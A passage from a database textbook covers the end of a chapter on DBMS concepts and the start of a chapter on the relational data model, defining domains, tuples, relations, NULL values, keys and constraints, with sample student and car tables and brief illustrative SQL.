facto industry standard for a long time. DL/1 has commands to locate a record (e.g.,
GET {UNIQUE, NEXT} <record type> WHERE <condition>). It has navigational
facilities to navigate within hierarchies (e.g., GET NEXT WITHIN PARENT or GET
{FIRST, NEXT} <record type> PATH WHERE <condition>). It has
appropriate facilities to store and update records (e.g., INSERT <record type>,
REPLACE <record type>). Currency issues during navigation are also handled with
additional features in the language.

7 Summary
In this chapter we introduced the main concepts used in database systems. We
defined a data model and we distinguished three main categories:

■ High-level or conceptual data models (based on entities and relationships)

■ Low-level or physical data models

■ Representational or implementation data models (record-based, object-
oriented)

We distinguished the schema, or description of a database, from the database itself.
The schema does not change very often, whereas the database state changes every
time data is inserted, deleted, or modified. Then we described the three-schema
DBMS architecture, which allows three schema levels:

■ An internal schema describes the physical storage structure of the database.

■ A conceptual schema is a high-level description of the whole database.

■ External schemas describe the views of different user groups.

A DBMS that cleanly separates the three levels must have mappings between the
schemas to transform requests and query results from one level to the next. Most
DBMSs do not separate the three levels completely. We used the three-schema archi-
tecture to define the concepts of logical and physical data independence.

Then we discussed the main types of languages and interfaces that DBMSs support.
A data definition language (DDL) is used to define the database conceptual schema.
In most DBMSs, the DDL also defines user views and, sometimes, storage struc-
tures; in other DBMSs, separate languages or functions exist for specifying storage
structures. This distinction is fading away in today’s relational implementations,
with SQL serving as a catchall language to perform multiple roles, including view
definition. The storage definition part (SDL) was included in SQL’s early versions,
but is now typically implemented as special commands for the DBA in relational
DBMSs. The DBMS compiles all schema definitions and stores their descriptions in
the DBMS catalog.

A data manipulation language (DML) is used for specifying database retrievals and
updates. DMLs can be high level (set-oriented, nonprocedural) or low level (record-
oriented, procedural). A high-level DML can be embedded in a host programming
language, or it can be used as a standalone language; in the latter case it is often
called a query language.

We discussed different types of interfaces provided by DBMSs, and the types of
DBMS users with which each interface is associated. Then we discussed the database
system environment, typical DBMS software modules, and DBMS utilities for help-
ing users and the DBA staff perform their tasks. We continued with an overview of
the two-tier and three-tier architectures for database applications, progressively
moving toward n-tier, which are now common in many applications, particularly
Web database applications.

Finally, we classified DBMSs according to several criteria: data model, number of
users, number of sites, types of access paths, and cost. We discussed the availability
of DBMSs and additional modules—from no cost in the form of open source soft-
ware, to configurations that annually cost millions to maintain. We also pointed out
the variety of licensing arrangements for DBMS and related products. The main
classification of DBMSs is based on the data model. We briefly discussed the main
data models used in current commercial DBMSs.

Review Questions
1. Define the following terms: data model, database schema, database state,
internal schema, conceptual schema, external schema, data independence,
DDL, DML, SDL, VDL, query language, host language, data sublanguage,
database utility, catalog, client/server architecture, three-tier architecture, and
n-tier architecture.

2. Discuss the main categories of data models. What are the basic differences
between the relational model, the object model, and the XML model?

3. What is the difference between a database schema and a database state?

4. Describe the three-schema architecture. Why do we need mappings between
schema levels? How do different schema definition languages support this
architecture?

5. What is the difference between logical data independence and physical data
independence? Which one is harder to achieve? Why?

6. What is the difference between procedural and nonprocedural DMLs?

7. Discuss the different types of user-friendly interfaces and the types of users
who typically use each.

8. With what other computer system software does a DBMS interact?

9. What is the difference between the two-tier and three-tier client/server
architectures?

10. Discuss some types of database utilities and tools and their functions.

11. What is the additional functionality incorporated in n-tier architecture
(n > 3)?

Exercises
12. Think of different users for the database shown in Figure A.1. What types of
applications would each user need? To which user category would each
belong, and what type of interface would each need?

13. Choose a database application with which you are familiar. Design a schema
and show a sample database for that application, using the notation of
Figures A.1 and 1. What types of additional information and constraints
would you like to represent in the schema? Think of several users of your
database, and design a view for each.

14. If you were designing a Web-based system to make airline reservations and
sell airline tickets, which DBMS architecture would you choose from Section
5? Why? Why would the other architectures not be a good choice?

15. Consider Figure 1. In addition to constraints relating the values of columns
in one table to columns in another table, there are also constraints that
impose restrictions on values in a column or a combination of columns
within a table. One such constraint dictates that a column or a group of
columns must be unique across all rows in the table. For example, in the
STUDENT table, the Student_number column must be unique (to prevent two
different students from having the same Student_number). Identify the col-
umn or the group of columns in the other tables that must be unique across
all rows in the table.

Selected Bibliography
Many database textbooks, including Date (2004), Silberschatz et al. (2006),
Ramakrishnan and Gehrke (2003), Garcia-Molina et al. (2000, 2009), and Abiteboul
et al. (1995), provide a discussion of the various database concepts presented here.
Tsichritzis and Lochovsky (1982) is an early textbook on data models. Tsichritzis
and Klug (1978) and Jardine (1977) present the three-schema architecture, which
was first suggested in the DBTG CODASYL report (1971) and later in an American
National Standards Institute (ANSI) report (1975). An in-depth analysis of the rela-
tional data model and some of its possible extensions is given in Codd (1990). The
proposed standard for object-oriented databases is described in Cattell et al. (2000).
Many documents describing XML are available on the Web, such as XML (2005).

Examples of database utilities are the ETI Connect, Analyze and Transform tools
(http://www.eti.com) and the database administration tool, DBArtisan, from
Embarcadero Technologies (http://www.embarcadero.com).

Figure A.1: A database that stores student and course information.

STUDENT
Name    Student_number  Class  Major
Smith   17              1      CS
Brown   8               2      CS

COURSE
Course_name                Course_number  Credit_hours  Department
Intro to Computer Science  CS1310         4             CS
Data Structures            CS3320         4             CS
Discrete Mathematics       MATH2410       3             MATH
Database                   CS3380         3             CS

SECTION
Section_identifier  Course_number  Semester  Year  Instructor
85                  MATH2410       Fall      07    King
92                  CS1310         Fall      07    Anderson
102                 CS3320         Spring    08    Knuth
112                 MATH2410       Fall      08    Chang
119                 CS1310         Fall      08    Anderson
135                 CS3380         Fall      08    Stone

GRADE_REPORT
Student_number  Section_identifier  Grade
17              112                 B
17              119                 C
8               85                  A
8               92                  A
8               102                 B
8               135                 A

PREREQUISITE
Course_number  Prerequisite_number
CS3380         CS3320
CS3380         MATH2410
CS3320         CS1310

The Relational Data Model and
Relational Database Constraints

The relational data model was first introduced by Ted Codd of IBM Research in 1970 in a classic
paper (Codd 1970), and it attracted immediate attention due to its simplicity and
mathematical foundation. The model uses the concept of a mathematical relation—
which looks somewhat like a table of values—as its basic building block, and has its
theoretical basis in set theory and first-order predicate logic. In this chapter we dis-
cuss the basic characteristics of the model and its constraints.

The first commercial implementations of the relational model became available in
the early 1980s, such as the SQL/DS system on the MVS operating system by IBM
and the Oracle DBMS. Since then, the model has been implemented in a large num-
ber of commercial systems. Current popular relational DBMSs (RDBMSs) include
DB2 and Informix Dynamic Server (from IBM), Oracle and Rdb (from Oracle),
Sybase DBMS (from Sybase), and SQL Server and Access (from Microsoft). In addi-
tion, several open source systems, such as MySQL and PostgreSQL, are available.

The relational model is extremely important. Of the languages associated with it,
the SQL query language is the standard for commercial relational DBMSs. The rela-
tional algebra and the relational calculus are two formal languages associated with
the relational model. The relational calculus is considered to be the basis for the
SQL language, and the relational algebra is used in the internals of many database
implementations for query processing and optimization.

From Chapter 3 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

Other aspects of the relational model are data structures relating to the constructs
of the ER and EER models and algorithms for designing a relational database
schema by mapping a conceptual schema in the ER or EER model into a relational
representation. These mappings are incorporated into many database design and
CASE1 tools. There are specific programming techniques used to access database
systems and connect to relational databases via ODBC and JDBC standard proto-
cols. Then there is Web database programming. Another aspect of the relational
model is the formal constraints of functional and multivalued dependencies; these
dependencies are used to develop a relational database design theory based on the
concept known as normalization.

Data models that preceded the relational model include the hierarchical and net-
work models. They were proposed in the 1960s and were implemented in early
DBMSs during the late 1960s and early 1970s. Because of their historical impor-
tance and the existing user base for these DBMSs, we have included a summary of
the highlights of these models in Appendices D and E, which are available on this
book’s Companion Website at http://www.aw.com/elmasri. These models and sys-
tems are now referred to as legacy database systems.

In this chapter, we concentrate on describing the basic principles of the relational
model of data. We begin by defining the modeling concepts and notation of the
relational model in Section 1. Section 2 is devoted to a discussion of relational con-
straints that are considered an important part of the relational model and are auto-
matically enforced in most relational DBMSs. Section 3 defines the update
operations of the relational model, discusses how violations of integrity constraints
are handled, and introduces the concept of a transaction. Section 4 summarizes the
chapter.

1 Relational Model Concepts
The relational model represents the database as a collection of relations. Informally,
each relation resembles a table of values or, to some extent, a flat file of records. It is
called a flat file because each record has a simple linear or flat structure. However,
there are important differences between relations and files, as we shall soon see.

When a relation is thought of as a table of values, each row in the table represents
a collection of related data values. A row represents a fact that typically corresponds
to a real-world entity or relationship. The table name and column names are
used to help to interpret the meaning of the values in each row. For example, imag-
ine a table called STUDENT where each row represents facts about a particular

student entity. The column names—Name, Student_number, Class, and Major—spec-
ify how to interpret the data values in each row, based on the column each value is
in. All values in a column are of the same data type.

1CASE stands for computer-aided software engineering.

In the formal relational model terminology, a row is called a tuple, a column header
is called an attribute, and the table is called a relation. The data type describing the
types of values that can appear in each column is represented by a domain of possi-
ble values. We now define these terms—domain, tuple, attribute, and relation—
formally.

1.1 Domains, Attributes, Tuples, and Relations
A domain D is a set of atomic values. By atomic we mean that each value in the
domain is indivisible as far as the formal relational model is concerned. A common
method of specifying a domain is to specify a data type from which the data values
forming the domain are drawn. It is also useful to specify a name for the domain, to
help in interpreting its values. Some examples of domains follow:

■ Usa_phone_numbers. The set of ten-digit phone numbers valid in the United
States.

■ Local_phone_numbers. The set of seven-digit phone numbers valid within a
particular area code in the United States. The use of local phone numbers is
quickly becoming obsolete, being replaced by standard ten-digit numbers.

■ Social_security_numbers. The set of valid nine-digit Social Security numbers.
(This is a unique identifier assigned to each person in the United States for
employment, tax, and benefits purposes.)

■ Names. The set of character strings that represent names of persons.

■ Grade_point_averages. Possible values of computed grade point averages;
each must be a real (floating-point) number between 0 and 4.

■ Employee_ages. Possible ages of employees in a company; each must be an
integer value between 15 and 80.

■ Academic_department_names. The set of academic department names in a
university, such as Computer Science, Economics, and Physics.

■ Academic_department_codes. The set of academic department codes, such as
‘CS’, ‘ECON’, and ‘PHYS’.

The preceding are called logical definitions of domains. A data type or format is
also specified for each domain. For example, the data type for the domain
Usa_phone_numbers can be declared as a character string of the form (ddd)ddd-
dddd, where each d is a numeric (decimal) digit and the first three digits form a
valid telephone area code. The data type for Employee_ages is an integer number
between 15 and 80. For Academic_department_names, the data type is the set of all
character strings that represent valid department names. A domain is thus given a
name, data type, and format. Additional information for interpreting the values of a
domain can also be given; for example, a numeric domain such as Person_weights
should have the units of measurement, such as pounds or kilograms.
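
To make this concrete, the sketch below shows one way such a domain could be given a
name, data type, and format in SQL. This is an illustration only, not a definition from
the text: the CREATE DOMAIN statement is standard SQL but is not supported by every
DBMS, and the pattern check uses the PostgreSQL regular-expression operator.

    CREATE DOMAIN Employee_ages AS INTEGER
        CHECK (VALUE BETWEEN 15 AND 80);            -- subrange of an integer data type

    CREATE DOMAIN Usa_phone_numbers AS CHAR(13)
        CHECK (VALUE ~ '^\(\d{3}\)\d{3}-\d{4}$');   -- the (ddd)ddd-dddd format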

A relation schema2 R, denoted by R(A1, A2, …, An), is made up of a relation name R
and a list of attributes, A1, A2, …, An. Each attribute Ai is the name of a role played
by some domain D in the relation schema R. D is called the domain of Ai and is
denoted by dom(Ai). A relation schema is used to describe a relation; R is called the
name of this relation. The degree (or arity) of a relation is the number of attributes
n of its relation schema.

A relation of degree seven, which stores information about university students,
would contain seven attributes describing each student, as follows:

STUDENT(Name, Ssn, Home_phone, Address, Office_phone, Age, Gpa)

Using the data type of each attribute, the definition is sometimes written as:

STUDENT(Name: string, Ssn: string, Home_phone: string, Address: string,
Office_phone: string, Age: integer, Gpa: real)

For this relation schema, STUDENT is the name of the relation, which has seven
attributes. In the preceding definition, we showed assignment of generic types such
as string or integer to the attributes. More precisely, we can specify the following
previously defined domains for some of the attributes of the STUDENT relation:
dom(Name) = Names; dom(Ssn) = Social_security_numbers; dom(Home_phone) =
Usa_phone_numbers3, dom(Office_phone) = Usa_phone_numbers, and dom(Gpa) =
Grade_point_averages. It is also possible to refer to attributes of a relation schema by
their position within the relation; thus, the second attribute of the STUDENT rela-
tion is Ssn, whereas the fourth attribute is Address.
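
As a preview of how such a schema is written down in SQL (covered in later chapters),
the STUDENT relation schema might be declared as follows. The column data types here
are illustrative stand-ins chosen for this sketch, not declarations taken from the text:

    CREATE TABLE STUDENT (
        Name          VARCHAR(50),   -- dom(Name) = Names
        Ssn           CHAR(9),       -- dom(Ssn) = Social_security_numbers
        Home_phone    CHAR(13),      -- dom(Home_phone) = Usa_phone_numbers
        Address       VARCHAR(60),
        Office_phone  CHAR(13),      -- dom(Office_phone) = Usa_phone_numbers
        Age           INTEGER,
        Gpa           REAL           -- dom(Gpa) = Grade_point_averages
    );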

A relation (or relation state)4 r of the relation schema R(A1, A2, …, An), also
denoted by r(R), is a set of n-tuples r = {t1, t2, …, tm}. Each n-tuple t is an ordered list
of n values t = <v1, v2, …, vn>, where each value vi, 1 ≤ i ≤ n, is an element of
dom(Ai) or is a special NULL value. (NULL values are discussed further below and in
Section 1.2.) The ith value in tuple t, which corresponds to the attribute Ai, is
referred to as t[Ai] or t.Ai (or t[i] if we use the positional notation). The terms
relation intension for the schema R and relation extension for a relation state r(R)
are also commonly used.

Figure 1 shows an example of a STUDENT relation, which corresponds to the
STUDENT schema just specified. Each tuple in the relation represents a particular
student entity (or object). We display the relation as a table, where each tuple is
shown as a row and each attribute corresponds to a column header indicating a role
or interpretation of the values in that column. NULL values represent attributes
whose values are unknown or do not exist for some individual STUDENT tuple.

2A relation schema is sometimes called a relation scheme.
3With the large increase in phone numbers caused by the proliferation of mobile phones, most metropoli-
tan areas in the U.S. now have multiple area codes, so seven-digit local dialing has been discontinued in
most areas. We changed this domain to Usa_phone_numbers, which is a more general choice,
instead of Local_phone_numbers. This illustrates how database requirements can change over time.
4This has also been called a relation instance. We will not use this term because instance is also used
to refer to a single tuple or row.

Figure 1: The attributes and tuples of a relation STUDENT.

STUDENT
Name            Ssn          Home_phone     Address               Office_phone   Age  Gpa
Benjamin Bayer  305-61-2435  (817)373-1616  2918 Bluebonnet Lane  NULL           19   3.21
Chung-cha Kim   381-62-1245  (817)375-4409  125 Kirby Road        NULL           18   2.89
Dick Davidson   422-11-2320  NULL           3452 Elgin Road       (817)749-1253  25   3.53
Rohan Panchal   489-22-1100  (817)376-9821  265 Lark Lane         (817)749-6492  28   3.93
Barbara Benson  533-69-1238  (817)839-8461  7384 Fontana Lane     NULL           19   3.25

The earlier definition of a relation can be restated more formally using set theory
concepts as follows. A relation (or relation state) r(R) is a mathematical relation of
degree n on the domains dom(A1), dom(A2), …, dom(An), which is a subset of the
Cartesian product (denoted by ×) of the domains that define R:

r(R) ⊆ (dom(A1) × dom(A2) × … × dom(An))

The Cartesian product specifies all possible combinations of values from the under-
lying domains. Hence, if we denote the total number of values, or cardinality, in a
domain D by |D| (assuming that all domains are finite), the total number of tuples
in the Cartesian product is

|dom(A1)| × |dom(A2)| × … × |dom(An)|

This product of cardinalities of all domains represents the total number of possible
instances or tuples that can ever exist in any relation state r(R). Of all these possible
combinations, a relation state at a given time—the current relation state—reflects
only the valid tuples that represent a particular state of the real world. In general, as
the state of the real world changes, so does the relation state, by being transformed
into another relation state. However, the schema R is relatively static and changes
very infrequently—for example, as a result of adding an attribute to represent new
information that was not originally stored in the relation.
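
As a small worked example with made-up domains, suppose a relation schema R(A1, A2) has
dom(A1) = {a, b, c} and dom(A2) = {0, 1}. Then |dom(A1)| × |dom(A2)| = 3 × 2 = 6, so the
Cartesian product contains six possible tuples, and every relation state r(R) is some
subset of those six tuples; the current state contains only the tuples that are valid in
the miniworld at that moment.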

It is possible for several attributes to have the same domain. The attribute names
indicate different roles, or interpretations, for the domain. For example, in the
STUDENT relation, the same domain Usa_phone_numbers plays the role of
Home_phone, referring to the home phone of a student, and the role of Office_phone,
referring to the office phone of the student. A third possible attribute (not shown)
with the same domain could be Mobile_phone.

1.2 Characteristics of Relations
The earlier definition of relations implies certain characteristics that make a relation
different from a file or a table. We now discuss some of these characteristics.

Figure 2: The relation STUDENT from Figure 1 with a different order of tuples.

STUDENT
Name            Ssn          Home_phone     Address               Office_phone   Age  Gpa
Dick Davidson   422-11-2320  NULL           3452 Elgin Road       (817)749-1253  25   3.53
Barbara Benson  533-69-1238  (817)839-8461  7384 Fontana Lane     NULL           19   3.25
Rohan Panchal   489-22-1100  (817)376-9821  265 Lark Lane         (817)749-6492  28   3.93
Chung-cha Kim   381-62-1245  (817)375-4409  125 Kirby Road        NULL           18   2.89
Benjamin Bayer  305-61-2435  (817)373-1616  2918 Bluebonnet Lane  NULL           19   3.21

Ordering of Tuples in a Relation. A relation is defined as a set of tuples.
Mathematically, elements of a set have no order among them; hence, tuples in a rela-
tion do not have any particular order. In other words, a relation is not sensitive to
the ordering of tuples. However, in a file, records are physically stored on disk (or in
memory), so there always is an order among the records. This ordering indicates
first, second, ith, and last records in the file. Similarly, when we display a relation as
a table, the rows are displayed in a certain order.

Tuple ordering is not part of a relation definition because a relation attempts to rep-
resent facts at a logical or abstract level. Many tuple orders can be specified on the
same relation. For example, tuples in the STUDENT relation in Figure 1 could be
ordered by values of Name, Ssn, Age, or some other attribute. The definition of a rela-
tion does not specify any order: There is no preference for one ordering over another.
Hence, the relation displayed in Figure 2 is considered identical to the one shown in
Figure 1. When a relation is implemented as a file or displayed as a table, a particular
ordering may be specified on the records of the file or the rows of the table.

Ordering of Values within a Tuple and an Alternative Definition of a
Relation. According to the preceding definition of a relation, an n-tuple is an
ordered list of n values, so the ordering of values in a tuple—and hence of attributes
in a relation schema—is important. However, at a more abstract level, the order of
attributes and their values is not that important as long as the correspondence
between attributes and values is maintained.

An alternative definition of a relation can be given, making the ordering of values
in a tuple unnecessary. In this definition, a relation schema R = {A1, A2, …, An} is a
set of attributes (instead of a list), and a relation state r(R) is a finite set of mappings
r = {t1, t2, …, tm}, where each tuple ti is a mapping from R to D, and D is the union
(denoted by ∪) of the attribute domains; that is, D = dom(A1) ∪ dom(A2) ∪ … ∪
dom(An). In this definition, t[Ai] must be in dom(Ai) for 1 ≤ i ≤ n for each mapping
t in r. Each mapping ti is called a tuple.

According to this definition of tuple as a mapping, a tuple can be considered as a set
of (<attribute>, <value>) pairs, where each pair gives the value of the mapping
from an attribute Ai to a value vi from dom(Ai). The ordering of attributes is not
important, because the attribute name appears with its value. By this definition, the
two tuples shown in Figure 3 are identical. This makes sense at an abstract level,
since there really is no reason to prefer having one attribute value appear before
another in a tuple.

Figure 3: Two identical tuples when the order of attributes and values is not part of the relation definition.

t = <(Name, Dick Davidson), (Ssn, 422-11-2320), (Home_phone, NULL), (Address, 3452 Elgin Road), (Office_phone, (817)749-1253), (Age, 25), (Gpa, 3.53)>

t = <(Address, 3452 Elgin Road), (Name, Dick Davidson), (Ssn, 422-11-2320), (Age, 25), (Office_phone, (817)749-1253), (Gpa, 3.53), (Home_phone, NULL)>

When a relation is implemented as a file, the attributes are physically ordered as
fields within a record. We will generally use the first definition of relation, where
the attributes and the values within tuples are ordered, because it simplifies much of
the notation. However, the alternative definition given here is more general.5

Values and NULLs in the Tuples. Each value in a tuple is an atomic value; that
is, it is not divisible into components within the framework of the basic relational
model. Hence, composite and multivalued attributes are not allowed. This model is
sometimes called the flat relational model. Much of the theory behind the rela-
tional model was developed with this assumption in mind, which is called the first
normal form assumption.6 Hence, multivalued attributes must be represented by
separate relations, and composite attributes are represented only by their simple
component attributes in the basic relational model.7

An important concept is that of NULL values, which are used to represent the values
of attributes that may be unknown or may not apply to a tuple. A special value,
called NULL, is used in these cases. For example, in Figure 1, some STUDENT tuples
have NULL for their office phones because they do not have an office (that is, office
phone does not apply to these students). Another student has a NULL for home
phone, presumably because either he does not have a home phone or he has one but
we do not know it (value is unknown). In general, we can have several meanings for
NULL values, such as value unknown, value exists but is not available, or attribute
does not apply to this tuple (also known as value undefined). An example of the last
type of NULL will occur if we add an attribute Visa_status to the STUDENT relation
that applies only to tuples representing foreign students. It is possible to devise dif-
ferent codes for different meanings of NULL values. Incorporating different types of
NULL values into relational model operations has proven difficult and is outside the
scope of our presentation.

5The alternative definition of relation is useful when discussing query processing and optimization.
6This assumption is not detailed here.
7Extensions of the relational model remove these restrictions. For example, object-relational systems
allow complex-structured attributes, as do the non-first normal form or nested relational models.

The exact meaning of a NULL value governs how it fares during arithmetic aggrega-
tions or comparisons with other values. For example, a comparison of two NULL
values leads to ambiguities—if both Customer A and B have NULL addresses, it does
not mean they have the same address. During database design, it is best to avoid
NULL values as much as possible.
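
To make the comparison problem concrete, here is a small SQL illustration (assuming
STUDENT is stored as an SQL table, as in the earlier sketch); it is not an example from
the text:

    -- IS NULL is the correct test for a missing office phone:
    SELECT Name FROM STUDENT WHERE Office_phone IS NULL;

    -- An ordinary comparison with NULL evaluates to UNKNOWN rather than TRUE,
    -- so this query returns no rows, even for students whose office phone is NULL:
    SELECT Name FROM STUDENT WHERE Office_phone = NULL;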

Interpretation (Meaning) of a Relation. The relation schema can be interpreted
as a declaration or a type of assertion. For example, the schema of the STUDENT
relation of Figure 1 asserts that, in general, a student entity has a Name, Ssn,
Home_phone, Address, Office_phone, Age, and Gpa. Each tuple in the relation can
then be interpreted as a fact or a particular instance of the assertion. For example,
the first tuple in Figure 1 asserts the fact that there is a STUDENT whose Name is
Benjamin Bayer, Ssn is 305-61-2435, Age is 19, and so on.

Notice that some relations may represent facts about entities, whereas other relations
may represent facts about relationships. For example, a relation schema MAJORS
(Student_ssn, Department_code) asserts that students major in academic disciplines. A
tuple in this relation relates a student to his or her major discipline. Hence, the rela-
tional model represents facts about both entities and relationships uniformly as rela-
tions. This sometimes compromises understandability because one has to guess
whether a relation represents an entity type or a relationship type. Mapping proce-
dures show how different constructs of the ER (Entity-Relationship) and EER
(Enhanced ER) conceptual data models get converted to relations.

An alternative interpretation of a relation schema is as a predicate; in this case, the
values in each tuple are interpreted as values that satisfy the predicate. For example,
the predicate STUDENT (Name, Ssn, …) is true for the five tuples in relation
STUDENT of Figure 1. These tuples represent five different propositions or facts in
the real world. This interpretation is quite useful in the context of logical program-
ming languages, such as Prolog, because it allows the relational model to be used
within these languages. An assumption called the closed world assumption states
that the only true facts in the universe are those present within the extension (state)
of the relation(s). Any other combination of values makes the predicate false.

1.3 Relational Model Notation
We will use the following notation in our presentation:

■ A relation schema R of degree n is denoted by R(A1, A2, …, An).

■ The uppercase letters Q, R, S denote relation names.

■ The lowercase letters q, r, s denote relation states.

■ The letters t, u, v denote tuples.

■ In general, the name of a relation schema such as STUDENT also indicates the
current set of tuples in that relation—the current relation state—whereas
STUDENT(Name, Ssn, …) refers only to the relation schema.

■ An attribute A can be qualified with the relation name R to which it belongs
by using the dot notation R.A—for example, STUDENT.Name or
STUDENT.Age. This is because the same name may be used for two attributes
in different relations. However, all attribute names in a particular relation
must be distinct.

■ An n-tuple t in a relation r(R) is denoted by t = <v1, v2, …, vn>, where vi is the
value corresponding to attribute Ai. The following notation refers to
component values of tuples:

■ Both t[Ai] and t.Ai (and sometimes t[i]) refer to the value vi in t for attribute
Ai.

■ Both t[Au, Aw, …, Az] and t.(Au, Aw, …, Az), where Au, Aw, …, Az is a list of
attributes from R, refer to the subtuple of values <vu, vw, …, vz> from t cor-
responding to the attributes specified in the list.

As an example, consider the tuple t = <‘Barbara Benson’, ‘533-69-1238’, ‘(817)839-8461’, ‘7384 Fontana Lane’, NULL, 19, 3.25> from the STUDENT relation in Figure 1;
we have t[Name] = <‘Barbara Benson’>, and t[Ssn, Gpa, Age] = <‘533-69-1238’, 3.25, 19>.

2 Relational Model Constraints
and Relational Database Schemas

So far, we have discussed the characteristics of single relations. In a relational data-
base, there will typically be many relations, and the tuples in those relations are usu-
ally related in various ways. The state of the whole database will correspond to the
states of all its relations at a particular point in time. There are generally many
restrictions or constraints on the actual values in a database state. These constraints
are derived from the rules in the miniworld that the database represents.

In this section, we discuss the various restrictions on data that can be specified on a
relational database in the form of constraints. Constraints on databases can gener-
ally be divided into three main categories:

1. Constraints that are inherent in the data model. We call these inherent
model-based constraints or implicit constraints.

2. Constraints that can be directly expressed in schemas of the data model, typ-
ically by specifying them in the DDL (data definition language). We call
these schema-based constraints or explicit constraints.


3. Constraints that cannot be directly expressed in the schemas of the data
model, and hence must be expressed and enforced by the application pro-
grams. We call these application-based or semantic constraints or business
rules.

The characteristics of relations that we discussed in Section 1.2 are the inherent
constraints of the relational model and belong to the first category. For example, the
constraint that a relation cannot have duplicate tuples is an inherent constraint. The
constraints we discuss in this section are of the second category, namely, constraints
that can be expressed in the schema of the relational model via the DDL.
Constraints in the third category are more general, relate to the meaning as well as
behavior of attributes, and are difficult to express and enforce within the data
model, so they are usually checked within the application programs that perform
database updates.

Another important category of constraints is data dependencies, which include
functional dependencies and multivalued dependencies. They are used mainly for
testing the “goodness” of the design of a relational database and are utilized in a
process called normalization.

The schema-based constraints include domain constraints, key constraints, con-
straints on NULLs, entity integrity constraints, and referential integrity constraints.

2.1 Domain Constraints
Domain constraints specify that within each tuple, the value of each attribute A
must be an atomic value from the domain dom(A). We have already discussed the
ways in which domains can be specified in Section 1.1. The data types associated
with domains typically include standard numeric data types for integers (such as
short integer, integer, and long integer) and real numbers (float and double-
precision float). Characters, Booleans, fixed-length strings, and variable-length
strings are also available, as are date, time, timestamp, and money, or other special
data types. Other possible domains may be described by a subrange of values from a
data type or as an enumerated data type in which all possible values are explicitly
listed.
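To make this concrete, standard SQL (covered later in this text) allows a domain to be declared once and then reused in attribute declarations; the following is a minimal sketch, and the domain names and value ranges are chosen here only for illustration. Not every commercial DBMS supports CREATE DOMAIN, in which case an equivalent CHECK clause can be attached directly to the attribute.

-- A domain defined as a subrange of a numeric data type
CREATE DOMAIN Gpa_domain AS DECIMAL(3,2)
    CHECK ( VALUE >= 0.00 AND VALUE <= 4.00 );

-- A domain defined by enumerating all of its possible values
CREATE DOMAIN Grade_domain AS CHAR(1)
    CHECK ( VALUE IN ('A', 'B', 'C', 'D', 'F', 'I') );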

2.2 Key Constraints and Constraints on NULL Values
In the formal relational model, a relation is defined as a set of tuples. By definition,
all elements of a set are distinct; hence, all tuples in a relation must also be distinct.
This means that no two tuples can have the same combination of values for all their
attributes. Usually, there are other subsets of attributes of a relation schema R with
the property that no two tuples in any relation state r of R should have the same
combination of values for these attributes. Suppose that we denote one such subset
of attributes by SK; then for any two distinct tuples t1 and t2 in a relation state r of R,
we have the constraint that:

t1[SK] ≠ t2[SK]


Any such set of attributes SK is called a superkey of the relation schema R. A
superkey SK specifies a uniqueness constraint that no two distinct tuples in any state
r of R can have the same value for SK. Every relation has at least one default
superkey—the set of all its attributes. A superkey can have redundant attributes,
however, so a more useful concept is that of a key, which has no redundancy. A key
K of a relation schema R is a superkey of R with the additional property that remov-
ing any attribute A from K leaves a set of attributes K′ that is not a superkey of R any
more. Hence, a key satisfies two properties:

1. Two distinct tuples in any state of the relation cannot have identical values
for (all) the attributes in the key. This first property also applies to a
superkey.

2. It is a minimal superkey—that is, a superkey from which we cannot remove
any attributes and still have the uniqueness constraint in condition 1 hold.
This property is not required by a superkey.

Whereas the first property applies to both keys and superkeys, the second property
is required only for keys. Hence, a key is also a superkey but not vice versa. Consider
the STUDENT relation of Figure 1. The attribute set {Ssn} is a key of STUDENT
because no two student tuples can have the same value for Ssn.8 Any set of attrib-
utes that includes Ssn—for example, {Ssn, Name, Age}—is a superkey. However, the
superkey {Ssn, Name, Age} is not a key of STUDENT because removing Name or Age
or both from the set still leaves us with a superkey. In general, any superkey formed
from a single attribute is also a key. A key with multiple attributes must require all
its attributes together to have the uniqueness property.

The value of a key attribute can be used to identify uniquely each tuple in the rela-
tion. For example, the Ssn value 305-61-2435 identifies uniquely the tuple corre-
sponding to Benjamin Bayer in the STUDENT relation. Notice that a set of attributes
constituting a key is a property of the relation schema; it is a constraint that should
hold on every valid relation state of the schema. A key is determined from the mean-
ing of the attributes, and the property is time-invariant: It must continue to hold
when we insert new tuples in the relation. For example, we cannot and should not
designate the Name attribute of the STUDENT relation in Figure 1 as a key because it
is possible that two students with identical names will exist at some point in a valid
state.9

In general, a relation schema may have more than one key. In this case, each of the
keys is called a candidate key. For example, the CAR relation in Figure 4 has two
candidate keys: License_number and Engine_serial_number. It is common to designate
one of the candidate keys as the primary key of the relation. This is the candidate
key whose values are used to identify tuples in the relation. We use the convention
that the attributes that form the primary key of a relation schema are underlined, as
shown in Figure 4. Notice that when a relation schema has several candidate keys,

8Note that Ssn is also a superkey.
9Names are sometimes used as keys, but then some artifact—such as appending an ordinal number—
must be used to distinguish between identical names.


CAR

License_number       Engine_serial_number   Make         Model     Year
Texas ABC-739        A69352                 Ford         Mustang   02
Florida TVP-347      B43696                 Oldsmobile   Cutlass   05
New York MPO-22      X83554                 Oldsmobile   Delta     01
California 432-TFY   C43742                 Mercedes     190-D     99
California RSK-629   Y82935                 Toyota       Camry     04
Texas RSK-629        U028365                Jaguar       XJS       04

Figure 4
The CAR relation, with two candidate keys:
License_number and Engine_serial_number.

the choice of one to become the primary key is somewhat arbitrary; however, it is
usually better to choose a primary key with a single attribute or a small number of
attributes. The other candidate keys are designated as unique keys, and are not
underlined.

Another constraint on attributes specifies whether NULL values are or are not per-
mitted. For example, if every STUDENT tuple must have a valid, non-NULL value for
the Name attribute, then Name of STUDENT is constrained to be NOT NULL.
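Anticipating the SQL data definition syntax presented in a later chapter, the key constraints on the CAR relation of Figure 4 could be declared roughly as sketched below; the data types shown are assumptions made only for illustration.

CREATE TABLE CAR
( License_number        VARCHAR(20)  NOT NULL,   -- chosen as the primary key
  Engine_serial_number  VARCHAR(20)  NOT NULL,   -- the other candidate key, declared UNIQUE
  Make                  VARCHAR(15),
  Model                 VARCHAR(15),
  Year                  CHAR(2),
PRIMARY KEY (License_number),
UNIQUE (Engine_serial_number) );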

2.3 Relational Databases and Relational
Database Schemas

The definitions and constraints we have discussed so far apply to single relations
and their attributes. A relational database usually contains many relations, with
tuples in relations that are related in various ways. In this section we define a rela-
tional database and a relational database schema.

A relational database schema S is a set of relation schemas S = {R1, R2, …, Rm} and
a set of integrity constraints IC. A relational database state10 DB of S is a set of
